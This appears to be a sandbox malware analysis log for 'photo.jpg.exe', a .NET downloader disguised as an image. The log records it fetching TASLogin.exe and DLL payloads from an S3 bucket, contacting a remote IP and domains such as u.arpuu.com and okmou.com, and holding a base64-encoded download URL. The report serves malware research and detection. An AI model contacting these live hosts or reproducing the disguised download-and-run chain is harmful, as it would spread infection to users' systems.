Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeFile opened: C:\Users\userJump to behavior
Source: global trafficTCP traffic: 192.168.2.9:49709 -> 13.208.251.115:3158
Source: global trafficHTTP traffic detected: GET /uu.txt HTTP/1.1Host: imagesyd.s3.ap-southeast-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /TASLoginBase.dll HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /commonbase.dll HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.edskv HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.txt HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /image.jpg HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.exe HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uu.txt HTTP/1.1Host: imagesyd.s3.ap-southeast-1.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /TASLoginBase.dll HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /commonbase.dll HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.edskv HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.txt HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /image.jpg HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficHTTP traffic detected: GET /TASLogin.exe HTTP/1.1Range: bytes=0-Host: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: imagesyd.s3.ap-southeast-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: u.arpuu.com
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: TASLogin.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, TASLogin.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: TASLogin.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002774000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002942000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002735000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000298D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000294D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002774000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002942000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002735000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000298D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000294D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.comd
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://imagesyd.s3.ap-southeast-1.amazonaws.comp
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, TASLogin.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLogin.exe.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: TASLogin.exe, 0000000E.00000002.1347476930.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000003.1324625603.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349071706.000000007F090000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 0000000E.00000002.1349312350.000000007F8D0000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000002.1457523743.000000007F8D0000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000003.1431217771.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000002.1455666033.00000000026C0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000014.00000002.1457283953.000000007F090000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000019.00000003.1524336228.000000007F610000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000019.00000002.1537407769.000000007F090000.00000004.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000019.00000002.1535904630.00000000026F0000.00000040.00001000.00020000.00000000.sdmp, TASLogin.exe, 00000019.00000002.1537748523.000000007F8D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://okmou.com/comments/add
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002774000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002942000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002735000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000298D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000294D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027E8000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002774000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002942000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002735000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000298D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000294D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000027F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-r-w.ap-southeast-1.amazonaws.comd
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000271F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, TASLogin.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000271F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskv
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskvd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.0000000002A1D000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exe
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exed
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exep
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.exex
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txt
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.txtd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dll
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dlld
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dll
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000027CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dlld
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmp, photo.jpg.exe, 00000000.00000002.1325579396.000000000275E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpg
Source: photo.jpg.exe, 00000000.00000002.1325579396.000000000290D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgd
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/image.jpgt-Nr
Source: photo.jpg.exe, 00000000.00000002.1325579396.00000000026D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.com/uu.txt
Source: photo.jpg.exe, 00000000.00000002.1325579396.0000000002A21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imagesyd.s3.ap-southeast-1.amazonaws.comD
Source: photo.jpg.exe, commonbase.dll.0.dr, TASLoginBase.dll.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 3.5.150.219:443 -> 192.168.2.9:49684 version: TLS 1.2

System Summary

barindex
Source: TASLoginBase.dll.0.drStatic PE information: section name: .]<_
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
Source: commonbase.dll.0.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: commonbase.dll.0.drStatic PE information: Number of sections : 11 > 10
Source: photo.jpg.exe, 00000000.00000000.897773091.0000000000288000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSIH ClientjJ vs photo.jpg.exe
Source: photo.jpg.exe, 00000000.00000002.1323953162.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs photo.jpg.exe
Source: photo.jpg.exeBinary or memory string: OriginalFilenameSIH ClientjJ vs photo.jpg.exe
Source: TASLogin.exe.0.drStatic PE information: Section: .ace ZLIB complexity 1.000368212090164
Source: TASLogin.exe.0.drStatic PE information: Section: .tvm0 ZLIB complexity 0.9970918543198529
Source: photo.jpg.exe, DownloaderApp.csBase64 encoded string: 'YUhSMGNITTZMeTlwYldGblpYTjVaQzV6TXk1aGNDMXpiM1YwYUdWaGMzUXRNUzVoYldGNmIyNWhkM011WTI5dEwzVjFMblI0ZEE9PQ=='
Source: classification engineClassification label: mal80.evad.winEXE@11/8@7/7
Source: C:\Users\user\Desktop\photo.jpg.exeFile created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeMutant created: NULL
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeMutant created: \Sessions\1\BaseNamedObjects\hkuewdbghrgxv
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\496ac3a0-389f-4b5d-aefb-5ce70a082f5fJump to behavior
Source: photo.jpg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: photo.jpg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\photo.jpg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: photo.jpg.exeVirustotal: Detection: 34%
Source: unknownProcess created: C:\Users\user\Desktop\photo.jpg.exe "C:\Users\user\Desktop\photo.jpg.exe"
Source: C:\Users\user\Desktop\photo.jpg.exeProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656
Source: unknownProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384
Source: unknownProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468
Source: C:\Users\user\Desktop\photo.jpg.exeProcess created: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" Jump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\photo.jpg.exeSection loaded: sspicli.dllJump to behavior
